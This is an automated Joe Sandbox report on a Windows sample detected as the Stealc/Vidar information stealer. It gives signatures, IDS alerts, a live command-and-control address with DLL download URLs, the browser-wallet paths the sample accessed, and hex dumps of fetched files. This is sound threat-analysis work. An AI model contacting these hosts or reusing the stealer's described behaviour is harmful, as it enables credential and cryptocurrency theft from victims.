Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1501501
MD5:9ee7d1fb0f1e8a7a998da096b4da22a9
SHA1:11cf686cb71ea7fbde2c0448ddd1f12ab44a393e
SHA256:7394adbf1fe4a07aa08d1e7d25c10b28994eb7eb8671b8ef767c349b5b44c37d
Tags:exe
Infos:

Detection

Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 5320 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9EE7D1FB0F1E8A7A998DA096B4DA22A9)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "185.215.113.100/e2b1563c6670f193.php"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      Process Memory Space: file.exe PID: 5320JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        Process Memory Space: file.exe PID: 5320JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: file.exe PID: 5320JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: file.exe PID: 5320JoeSecurity_StealcYara detected StealcJoe Security
              No Sigma rule has matched
              Timestamp:2024-08-30T00:48:01.527095+0200
              SID:2044248
              Severity:1
              Source Port:49704
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-30T00:48:00.047505+0200
              SID:2044245
              Severity:1
              Source Port:80
              Destination Port:49704
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-30T00:48:10.755871+0200
              SID:2803304
              Severity:3
              Source Port:49704
              Destination Port:80
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-08-30T00:48:00.291547+0200
              SID:2044246
              Severity:1
              Source Port:49704
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-30T00:48:02.061081+0200
              SID:2803304
              Severity:3
              Source Port:49704
              Destination Port:80
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-08-30T00:48:12.452365+0200
              SID:2803304
              Severity:3
              Source Port:49704
              Destination Port:80
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-08-30T00:48:08.158058+0200
              SID:2803304
              Severity:3
              Source Port:49704
              Destination Port:80
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-08-30T00:48:10.036605+0200
              SID:2803304
              Severity:3
              Source Port:49704
              Destination Port:80
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-08-30T00:48:00.041454+0200
              SID:2044244
              Severity:1
              Source Port:49704
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-30T00:48:12.906494+0200
              SID:2803304
              Severity:3
              Source Port:49704
              Destination Port:80
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-08-30T00:47:59.792672+0200
              SID:2044243
              Severity:1
              Source Port:49704
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-30T00:48:00.298577+0200
              SID:2044247
              Severity:1
              Source Port:80
              Destination Port:49704
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-30T00:48:09.396625+0200
              SID:2803304
              Severity:3
              Source Port:49704
              Destination Port:80
              Protocol:TCP
              Classtype:Unknown Traffic

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: http://185.215.113.100/URL Reputation: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phpURL Reputation: Label: malware
              Source: http://185.215.113.100URL Reputation: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phpH;Avira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.php=IqAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phphAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phpion:Avira URL Cloud: Label: malware
              Source: http://185.215.113.100/0d60be0de163924d/msvcp140.dllKAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phpBrowserAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/0d60be0de163924d/vcruntime140.dllAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phpmAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phppAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phpfAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/0d60be0de163924d/mozglue.dllAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phpndIAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/0d60be0de163924d/softokn3.dllAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.php:Avira URL Cloud: Label: malware
              Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dllAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/0d60be0de163924d/nss3.dllcAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.php(Avira URL Cloud: Label: malware
              Source: http://185.215.113.100/0d60be0de163924d/freebl3.dllAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/0d60be0de163924d/nss3.dllAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/0d60be0de163924d/vcruntime140.dlll5Avira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.php0Avira URL Cloud: Label: malware
              Source: http://185.215.113.100/0d60be0de163924d/vcruntime140.dllNAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/0d60be0de163924d/msvcp140.dllAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.php$Avira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.php3Avira URL Cloud: Label: malware
              Source: 185.215.113.100/e2b1563c6670f193.phpAvira URL Cloud: Label: malware
              Source: http://185.215.113.100/0d60be0de163924d/msvcp140.dll)Avira URL Cloud: Label: malware
              Source: http://185.215.113.100/e2b1563c6670f193.phpLoAvira URL Cloud: Label: malware
              Source: file.exe.5320.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.215.113.100/e2b1563c6670f193.php"}
              Source: file.exeReversingLabs: Detection: 36%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00189BB0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00189BB0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00198940 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00198940
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00187280 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00187280
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00189B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00189B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018C660 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,0_2_0018C660
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C686C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,0_2_6C686C80
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
              Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2294569014.000000006C8AF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0018D8C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001939B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_001939B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0018E270
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001943F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001943F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0018BCB0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0018F4F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00181710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00181710
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00194050 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00194050
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0018EB60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001933C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_001933C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0018DC50
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.100:80
              Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.100:80
              Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.100:80 -> 192.168.2.5:49704
              Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.100:80
              Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.100:80 -> 192.168.2.5:49704
              Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.100:80
              Source: Malware configuration extractorURLs: 185.215.113.100/e2b1563c6670f193.php
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 22:48:01 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 22:48:08 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 22:48:09 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 